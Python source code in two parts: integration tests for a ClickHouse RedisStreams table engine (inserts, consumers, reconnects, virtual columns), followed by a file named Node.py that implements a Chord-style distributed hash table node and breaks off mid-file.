redis_cluster.redis_host,
','.join(stream_names),
group_name
)
)
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query("INSERT INTO test.redis SETTINGS stream_like_engine_insert_queue = 'insert_many_stream_rights1' VALUES {}".format(values))
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
while True:
insert_messages = connection.xread({'insert_many_stream_rights1': "0-0"}, count=50)
# xread returns list of lists of topics and messages - select first topic and its messages
insert_messages = insert_messages[0][1]
if len(insert_messages) == 50:
break
result = "\n".join(
map(lambda x: x[1]["key".encode()].decode() + "\t" + x[1]["value".encode()].decode(), insert_messages))
redis_check_result(result, True)
def test_redis_many_inserts(redis_cluster):
stream_name = 'many_inserts'
group_name = 'test_many_inserts'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.redis_many;
DROP TABLE IF EXISTS test.redis_consume;
DROP TABLE IF EXISTS test.view_many;
DROP TABLE IF EXISTS test.consumer_many;
CREATE TABLE test.redis_many (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}:6379',
redis_stream_list = '{1}',
redis_group_name = '{2}';
CREATE TABLE test.redis_consume (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}:6379',
redis_stream_list = '{1}',
redis_group_name = '{2}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 10000
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
def insert():
while True:
try:
instance.query(
"INSERT INTO test.redis_many VALUES {}".format(values)
)
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query(
"""
CREATE TABLE test.view_many (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer_many TO test.view_many AS
SELECT * FROM test.redis_consume;
"""
)
for thread in threads:
thread.join()
while True:
result = instance.query("SELECT count() FROM test.view_many")
print(result, messages_num * threads_num)
if int(result) == messages_num * threads_num:
break
time.sleep(1)
instance.query(
"""
DROP TABLE test.redis_consume;
DROP TABLE test.redis_many;
DROP TABLE test.consumer_many;
DROP TABLE test.view_many;
"""
)
assert (
int(result) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result)
def test_redis_overloaded_insert(redis_cluster):
stream_name = 'over'
group_name = 'test_over'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.view_overload;
DROP TABLE IF EXISTS test.consumer_overload;
DROP TABLE IF EXISTS test.redis_consume;
CREATE TABLE test.redis_consume (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}',
redis_stream_list = '{1}',
redis_num_consumers = 5,
redis_max_block_size = 10000,
redis_group_name = '{2}';
CREATE TABLE test.redis_overload (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{0}',
redis_stream_list = '{1}',
redis_group_name = '{2}';
CREATE TABLE test.view_overload (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer_overload TO test.view_overload AS
SELECT * FROM test.redis_consume;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 100000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ",".join(values)
while True:
try:
instance.query(
"INSERT INTO test.redis_overload VALUES {}".format(values)
)
break
except QueryRuntimeException as e:
if "Local: Timed out." in str(e):
continue
else:
raise
threads = []
threads_num = 5
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query("SELECT count() FROM test.view_overload")
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query(
"""
DROP TABLE test.consumer_overload;
DROP TABLE test.view_overload;
DROP TABLE test.redis_consume;
DROP TABLE test.redis_overload;
"""
)
for thread in threads:
thread.join()
assert (
int(result) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result)
def test_redis_virtual_columns(redis_cluster):
stream_name = 'virtuals'
group_name = 'test_virtuals'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis_virtuals (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, key, _stream, _key, _timestamp, _sequence_number FROM test.redis_virtuals;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
message_num = 10
for i in range(message_num):
connection.xadd(stream_name, {"key": i, "value": i}, str(i + 1) + "-0")
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"""
SELECT key, value, _stream, _key, _timestamp, _sequence_number
FROM test.view ORDER BY key
"""
)
expected = """\
0 0 virtuals 1-0 1 0
1 1 virtuals 2-0 2 0
2 2 virtuals 3-0 3 0
3 3 virtuals 4-0 4 0
4 4 virtuals 5-0 5 0
5 5 virtuals 6-0 6 0
6 6 virtuals 7-0 7 0
7 7 virtuals 8-0 8 0
8 8 virtuals 9-0 9 0
9 9 virtuals 10-0 10 0
"""
instance.query(
"""
DROP TABLE test.redis_virtuals;
DROP TABLE test.view;
"""
)
assert TSV(result) == TSV(expected)
def test_redis_virtual_columns_with_materialized_view(redis_cluster):
stream_name = 'virtuals_mv'
group_name = 'test_virtuals_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis_virtuals_mv (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64,
stream String, message_id String, timestamp UInt8, sequence_number UInt8) ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _stream as stream, _key as message_id, _timestamp as timestamp, _sequence_number as sequence_number
FROM test.redis_virtuals_mv;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
message_num = 10
for i in range(message_num):
connection.xadd(stream_name, {"key": i, "value": i}, str(i + 1) + "-0")
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == message_num:
break
connection.close()
result = instance.query(
"SELECT key, value, stream, message_id, timestamp, sequence_number FROM test.view ORDER BY key"
)
expected = """\
0 0 virtuals_mv 1-0 1 0
1 1 virtuals_mv 2-0 2 0
2 2 virtuals_mv 3-0 3 0
3 3 virtuals_mv 4-0 4 0
4 4 virtuals_mv 5-0 5 0
5 5 virtuals_mv 6-0 6 0
6 6 virtuals_mv 7-0 7 0
7 7 virtuals_mv 8-0 8 0
8 8 virtuals_mv 9-0 9 0
9 9 virtuals_mv 10-0 10 0
"""
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.view;
DROP TABLE test.redis_virtuals_mv
"""
)
assert TSV(result) == TSV(expected)
def test_redis_many_consumers_to_each_stream(redis_cluster):
NUM_STREAMS = 2
NUM_TABLES = 4
streams = []
group_name = 'test_many_consumers'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('many_consumers_{}'.format(i))
for stream in streams:
connection.xgroup_create(stream, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, consumer_id String)
ENGINE = MergeTree()
ORDER BY key;
"""
)
query = ""
for table_id in range(NUM_TABLES):
query += """
DROP TABLE IF EXISTS test.many_consumers_{0};
DROP TABLE IF EXISTS test.many_consumers_{0}_mv;
CREATE TABLE test.many_consumers_{0} (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{1}:6379',
redis_stream_list = '{2}',
redis_group_name = '{3}',
redis_num_consumers = 2,
redis_max_block_size = 500;
CREATE MATERIALIZED VIEW test.many_consumers_{0}_mv TO test.destination AS
SELECT key, value, _consumer AS consumer_id FROM test.many_consumers_{0};
""".format(
table_id,
redis_cluster.redis_host,
','.join(streams),
group_name,
)
instance.query(query)
i = [0]
messages_num = 5000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = 5 * NUM_STREAMS
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.destination")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT consumer_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(NUM_TABLES):
instance.query(
"""
DROP TABLE test.many_consumers_{0};
DROP TABLE test.many_consumers_{0}_mv;
""".format(
consumer_id
)
)
instance.query(
"""
DROP TABLE test.destination;
"""
)
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result1)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_redis_many_consumers_with_threads_to_each_stream(redis_cluster):
NUM_STREAMS = 2
NUM_TABLES = 4
streams = []
group_name = 'test_many_consumers_with_threads'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
for i in range(NUM_STREAMS):
streams.append('many_consumers_with_threads_{}'.format(i))
for stream in streams:
connection.xgroup_create(stream, group_name, '$', mkstream=True)
instance.query(
"""
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination(key UInt64, value UInt64, consumer_id String)
ENGINE = MergeTree()
ORDER BY key;
"""
)
query = ""
for table_id in range(NUM_TABLES):
query += """
DROP TABLE IF EXISTS test.many_consumers_with_threads_{0};
DROP TABLE IF EXISTS test.many_consumers_with_threads_{0}_mv;
CREATE TABLE test.many_consumers_with_threads_{0} (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{1}:6379',
redis_stream_list = '{2}',
redis_group_name = '{3}',
redis_num_consumers = 2,
redis_thread_per_consumer = true;
CREATE MATERIALIZED VIEW test.many_consumers_with_threads_{0}_mv TO test.destination AS
SELECT key, value, _consumer AS consumer_id FROM test.many_consumers_with_threads_{0};
""".format(
table_id,
redis_cluster.redis_host,
','.join(streams),
group_name,
)
instance.query(query)
i = [0]
messages_num = 5000
def produce(stream_name):
messages = []
for _ in range(messages_num):
messages.append({"key": i[0], "value": i[0]})
i[0] += 1
for message in messages:
connection.xadd(stream_name, message)
connection.close()
threads = []
threads_num = 5 * NUM_STREAMS
for j in range(threads_num):
threads.append(threading.Thread(target=produce, args=(streams[j % len(streams)],)))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result1 = instance.query("SELECT count() FROM test.destination")
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT consumer_id) FROM test.destination")
for thread in threads:
thread.join()
for consumer_id in range(NUM_TABLES):
instance.query(
"""
DROP TABLE test.many_consumers_with_threads_{0};
DROP TABLE test.many_consumers_with_threads_{0}_mv;
""".format(
consumer_id
)
)
instance.query(
"""
DROP TABLE test.destination;
"""
)
assert (
int(result1) == messages_num * threads_num
), "ClickHouse lost some messages: {}".format(result1)
# 4 tables, 2 consumers for each table => 8 consumer tags
assert int(result2) == 8
def test_redis_restore_failed_connection_without_losses(redis_cluster):
stream_name = 'with_losses'
group_name = 'test_with_losses'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.consumer_reconnect (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = 10;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages_num = 150000
for i in range(messages_num):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
instance.query(
"""
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.consumer_reconnect;
"""
)
while int(instance.query("SELECT count() FROM test.view")) == 0:
time.sleep(0.1)
kill_redis(redis_cluster.redis_docker_id)
time.sleep(8)
revive_redis(redis_cluster.redis_docker_id)
while True:
result = instance.query("SELECT count(DISTINCT key) FROM test.view")
time.sleep(1)
if int(result) == messages_num:
break
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.consumer_reconnect;
"""
)
assert int(result) == messages_num, "ClickHouse lost some messages: {}".format(
result
)
def test_redis_no_connection_at_startup_1(redis_cluster):
# no connection when table is initialized
stream_name = 'cs'
group_name = 'test_cs'
redis_cluster.pause_container("redis1")
instance.query_and_get_error(
"""
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
redis_cluster.unpause_container("redis1")
def test_redis_no_connection_at_startup_2(redis_cluster):
stream_name = 'no_connection'
group_name = 'test_no_connection'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.cs (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_num_consumers = '5';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.cs;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
instance.query("DETACH TABLE test.cs")
redis_cluster.pause_container("redis1")
instance.query("ATTACH TABLE test.cs")
redis_cluster.unpause_container("redis1")
messages_num = 1000
for i in range(messages_num):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
while True:
result = instance.query("SELECT count() FROM test.view")
time.sleep(1)
if int(result) == messages_num:
break
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.cs;
"""
)
assert int(result) == messages_num, "ClickHouse lost some messages: {}".format(
result
)
def test_redis_json_format_factory_settings(redis_cluster):
stream_name = 'format_settings'
group_name = 'test_format_settings'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.format_settings (
id String, date DateTime
) ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
date_time_input_format = 'best_effort';
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"id": "format_settings_test", "date": "2021-01-19T14:42:33.1829214Z"})
expected = instance.query(
"""SELECT parseDateTimeBestEffort(CAST('2021-01-19T14:42:33.1829214Z', 'String'))"""
)
result = ""
while True:
result = instance.query("SELECT date FROM test.format_settings")
if result == expected:
break
instance.query(
"""
CREATE TABLE test.view (
id String, date DateTime
) ENGINE = MergeTree ORDER BY id;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.format_settings;
"""
)
connection.xadd(stream_name, {"id": "format_settings_test", "date": "2021-01-19T14:42:33.1829214Z"})
result = ""
while True:
result = instance.query("SELECT date FROM test.view")
if result == expected:
break
connection.close()
instance.query(
"""
DROP TABLE test.consumer;
DROP TABLE test.format_settings;
"""
)
assert result == expected
def test_redis_manage_groups_properly(redis_cluster):
stream_name = 'manage_groups'
group_name = 'test_manage_groups'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
instance.query(
"""
CREATE TABLE test.redis_drop (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_manage_consumer_groups = true;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis_drop ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
exists = False
try:
connection.xgroup_create(stream_name, group_name, '$')
except Exception as e:
exists = "BUSYGROUP" in str(e)
assert exists
instance.query("DROP TABLE test.redis_drop")
time.sleep(10)
try:
connection.xgroup_create(stream_name, group_name, '$')
exists = False
except Exception as e:
exists = True
assert not exists
def test_redis_consume_stream(redis_cluster):
stream_name = 'consume_stream'
group_name = 'test_consume_stream'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
i = [0]
messages_num = 1000
def produce():
for _ in range(messages_num):
connection.xadd(stream_name, {"key": i[0], "value": i[0]})
i[0] += 1
threads = []
threads_num = 10
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
instance.query(
"""
CREATE TABLE test.redis_stream (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_manage_consumer_groups = true,
redis_consumer_groups_start_id = '0-0';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis_stream;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
result = ""
while True:
result = instance.query("SELECT count() FROM test.view")
if int(result) == messages_num * threads_num:
break
time.sleep(1)
for thread in threads:
thread.join()
instance.query("DROP TABLE test.redis_stream")
def test_redis_bad_args(redis_cluster):
instance.query_and_get_error(
"""
CREATE TABLE test.drop (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = 'redis1:6379',
redis_stream_list = 'f',
redis_manage_consumer_groups = true,
redis_consumer_groups_start_id = '0-0';
"""
)
def test_redis_drop_mv(redis_cluster):
stream_name = 'drop_mv'
group_name = 'test_drop_mv'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
messages = []
for i in range(20):
connection.xadd(stream_name, {"key": i, "value": i})
instance.query("DROP VIEW test.consumer")
for i in range(20, 40):
connection.xadd(stream_name, {"key": i, "value": i})
instance.query(
"""
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.redis;
"""
)
for i in range(40, 50):
connection.xadd(stream_name, {"key": i, "value": i})
while True:
result = instance.query("SELECT * FROM test.view ORDER BY key")
if redis_check_result(result):
break
redis_check_result(result, True)
instance.query("DROP VIEW test.consumer")
time.sleep(10)
for i in range(50, 60):
connection.xadd(stream_name, {"key": i, "value": i})
connection.close()
count = 0
while True:
count = int(instance.query("SELECT count() FROM test.redis"))
if count:
break
assert count > 0
def test_redis_predefined_configuration(redis_cluster):
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams(redis1) """
)
connection.xadd('named', {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
def test_redis_not_ack_on_select(redis_cluster):
stream_name = 'not_ack_on_select'
group_name = 'test_not_ack_on_select'
connection = redis.Redis(redis_cluster.redis_ip, port=redis_cluster.redis_port, password="clickhouse")
connection.xgroup_create(stream_name, group_name, '$', mkstream=True)
instance.query(
"""
CREATE TABLE test.redis (key UInt64, value UInt64)
ENGINE = RedisStreams
SETTINGS redis_broker = '{}:6379',
redis_stream_list = '{}',
redis_group_name = '{}',
redis_ack_on_select = false;
""".format(
redis_cluster.redis_host,
stream_name,
group_name
)
)
connection.xadd(stream_name, {"key": 1, "value": 2})
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
time.sleep(5)
while True:
result = instance.query(
"SELECT * FROM test.redis ORDER BY key", ignore_error=True
)
if result == "1\t2\n":
break
if __name__ == "__main__":
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
Node.py
|
import json
import socket
import time
from hashlib import sha1
import random
import threading
from queue import Queue
from copy import copy
# project files
from src import utils
from src.utils import log
from src.Finger import Finger
from src.rpc_handlers import REQUEST_MAP, STATUS_CONFLICT
from src.Storage import Storage
hash_func = sha1
Finger.hash_func = hash_func
class Node:
"""
Defines an E-Chord Node
"""
def __init__(self, port=None):
"""
Initializes a new node
"""
# data storage dictionary to hold (key, value) pairs
self.storage = Storage()
# RW mutex to avoid writes in the middle of RPCs
# RPCs are considered readers, the main thread is considered the writer
self.stabilize_mutex = utils.RWLock()
# create threads to listen for connections and to send stabilize signal
self.event_queue = Queue()
# set address for server and client
self.SERVER_ADDR = ("", port) if port is not None else (utils.get_ip(), utils.params["host"]["server_port"])
# initialize finger table and successor list
self.finger_table = [Finger(self.SERVER_ADDR)] * utils.params["ring"]["bits"]
self.successor_list = []
self.successor_list_index = -1
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# ID will be SHA-1(IP+port)
self.node_id = utils.get_id(self.SERVER_ADDR[0] + str(self.SERVER_ADDR[1]), hash_func)
log.debug(f"Initialized with node ID: {self.node_id}")
self.predecessor = None
# variable indicating intent to leave
# once true, the node will try to move its keys and leave after each stabilize
self.leaving = False
self.join_ring()
self.ask_peer((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]),
"add_node", {"ip": self.SERVER_ADDR[0], "port": self.SERVER_ADDR[1], "node_id": self.node_id})
self.listen()
def join_ring(self):
"""
Joins ring by getting seed from seed server and asking it to find successor
:return: None
"""
while True:
# get initial node from seed server
data = self.get_seed()
log.debug("Asked seed server")
if data["header"]["status"] == STATUS_CONFLICT:
log.critical("ID conflict in network. Please change port.")
exit(1)
# Join ring
# if at least one other node exists
if data["header"]["status"] in range(200, 300):
log.info("Got seed from seed server")
log.debug(f"Seed address: {data['body']['ip'], data['body']['port']}")
seed_dead = False
while True:
self.predecessor = None
# get successor from seed node
log.info("Asking seed for successor")
response = self.ask_peer((data["body"]["ip"], data["body"]["port"]),
"find_successor", {"for_id": self.node_id})
if not response or response["header"]["status"] not in range(200, 300):
# tell seed server that seed node has died
self.ask_peer((utils.params["seed_server"]["ip"], utils.params["seed_server"]["port"]),
"dead_node", {"ip": data["body"]["ip"], "port": data["body"]["port"],
"node_id": data["body"]["node_id"]})
seed_dead = True
break
self.finger_table[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.info("Got successor")
log.debug(f"Successor address: {self.finger_table[0].addr} with node ID: "
f"{self.finger_table[0].node_id}")
# initialize successor list, or get new successor if successor is dead
if self.init_successor_list():
log.info("Initialized successor list")
break
# if successor has died, wait for other nodes to stabilize before asking for new successor
log.info("Waiting for stabilization")
time.sleep(utils.params["ring"]["stabilize_delay"])
# if seed node is dead, reseed
if seed_dead:
log.info("Seed is dead, retrying...")
continue
# if this is the first node
else:
log.info("No other nodes in the network")
self.predecessor = Finger(self.SERVER_ADDR)
for i in range(len(self.successor_list)):
self.successor_list[i] = copy(self.predecessor)
log.info("Initialized predecessor and sucessor list to self")
break
def init_successor_list(self):
"""
Initializes successor_list
:return: True if successful, False if this node's successor is dead
"""
# ask successor for this node's successor list
log.info("Asking successor for this node's successor list")
response = self.ask_peer(self.finger_table[0].addr, "get_prev_successor_list", {})
# successor is dead
if not response:
log.info("Successor is dead")
return False
# populating this node's successor list
for i, successor in enumerate(response["body"]["successor_list"]):
new_finger = Finger((successor["ip"], successor["port"]), successor["node_id"])
try:
self.successor_list[i] = new_finger
except IndexError:
self.successor_list.append(new_finger)
return True
def find_key(self, key):
"""
Finds node that contains key and returns the key's value
:param key: the key
:return: the key's value, or None if not found
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding value for ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return None
log.debug(f"Node found to store key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "lookup", {"key": key})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't find key")
return None
log.debug("Value found")
return response["body"]["value"]
def find_and_store_key(self, key, value):
"""
Finds node that key should be stored in and stores it there
If the key already exists, this will update its value with the given value
:param key: the key
:param value: the value of the key
:return: bool, whether the insertion was successful
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding node to store key {key} with ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return False
log.debug(f"Node found to store key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "store_key", {"key": key, "value": value, "key_id": key_id})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't store key")
return False
log.debug("Pair stored")
return True
def find_and_delete_key(self, key):
"""
Finds node that key should be deleted from and deletes it
That node will deal with deleting backups
:param key: the key
:return: bool, whether the deletion was successful
"""
key_id = utils.get_id(key, hash_func)
log.info(f"Finding node to delete key {key} with ID {key_id}")
new_node = self.find_successor(key_id)
if not new_node:
log.debug("Couldn't find node")
return False
log.debug(f"Node found to delete key has ID: {new_node[2]}")
response = self.ask_peer(new_node[:2], "delete_key", {"key": key})
if not response or response["header"]["status"] not in range(200, 300):
log.debug("Couldn't delete key")
return False
log.debug("Pair deleted")
return True
def move_keys_to_predecessor(self):
"""
Moves keys from this node to predecessor
The keys moved will be the ones, which should be in that node instead of this one
Condition for moving a key: key_id <= other_node.id
:return: bool; whether move was successful
"""
if self.predecessor.node_id == self.node_id:
return True
to_move = []
for key in self.storage:
# Keys that should be transferred are between current node (lower bound)
# and new node (inclusive upper bound)
# As it stands, the keys held by current node fall either after or before the new node
# The keys that fall between should be left with this node
# The keys that fall before the new node should be transferred to it
if utils.is_between_clockwise(self.storage.get_id(key), self.node_id, self.predecessor.node_id,
inclusive_upper=True):
to_move.append({"key": key, "value": self.storage[key], "key_id": self.storage.get_id(key)})
if not to_move:
return True
response = self.ask_peer(self.predecessor.addr, "batch_store_keys", {"keys": to_move}, pre_request=True)
if not response or response["header"]["status"] not in range(200, 300):
return False
# delete from local storage if keys were moved successfully
for key_dict in to_move:
del self.storage[key_dict["key"]]
return True
def move_keys_to_successor(self):
"""
Move all keys to successor before exiting
:return: bool; whether move was successful
"""
if self.finger_table[0].node_id == self.node_id:
return True
to_move = self.storage.dump()
if not to_move:
return True
response = self.ask_peer(self.finger_table[0].addr, "batch_store_keys", {"keys": to_move}, pre_request=True)
return bool(response)
def stabilize(self):
"""
Stabilize ring by updating successor or successor's predecessor
:return: None
"""
log.info("Stabilizing...")
current_successor = self.finger_table[0]
# ask all successors in successor list until one responds, remove dead ones
while len(self.successor_list):
response = self.ask_peer(current_successor.addr, "get_predecessor", {})
if not response:
# current successor was dead, get a new one from the successor list
log.info("Successor is dead, getting next in list")
log.debug(f"Successor dead is: {current_successor.addr}")
if self.predecessor and self.predecessor.node_id == current_successor.node_id:
self.predecessor = None
current_successor = self.successor_list[0]
del self.successor_list[0]
continue
self.finger_table[0] = current_successor
break
else:
log.info("All successors in successor list are dead")
self.join_ring()
return
status_ok = response["header"]["status"] in range(200, 300)
if status_ok:
# if successor has this node as predecessor
if self.node_id == response["body"]["node_id"]:
log.debug("Successor's predecessor is this node")
return
# check if successor's predecessor is dead
poll_response = self.ask_peer((response["body"]["ip"], response["body"]["port"]), "poll", {})
# if it is, notify successor and return
if not poll_response:
self.ask_peer(self.finger_table[0].addr, "clear_predecessor", {})
return
# if new node joined between this node and its successor
if utils.is_between_clockwise(response["body"]["node_id"], self.node_id, self.finger_table[0].node_id):
# shift successor list by 1
self.successor_list.insert(0, self.finger_table[0])
del self.successor_list[-1]
# update successor
self.finger_table[0] = Finger((response["body"]["ip"], response["body"]["port"]),
response["body"]["node_id"])
log.info("Got new successor")
log.debug(f"New succesor address: {response['body']['ip'], response['body']['port']} with node ID: "
f"{response['body']['node_id']}")
# update successor's predecessor to be this node
self.ask_peer(self.finger_table[0].addr, "update_predecessor", {"ip": self.SERVER_ADDR[0],
"port": self.SERVER_ADDR[1],
"node_id": self.node_id})
log.debug("Asked successor to make this node its predecessor")
def fix_fingers(self):
"""
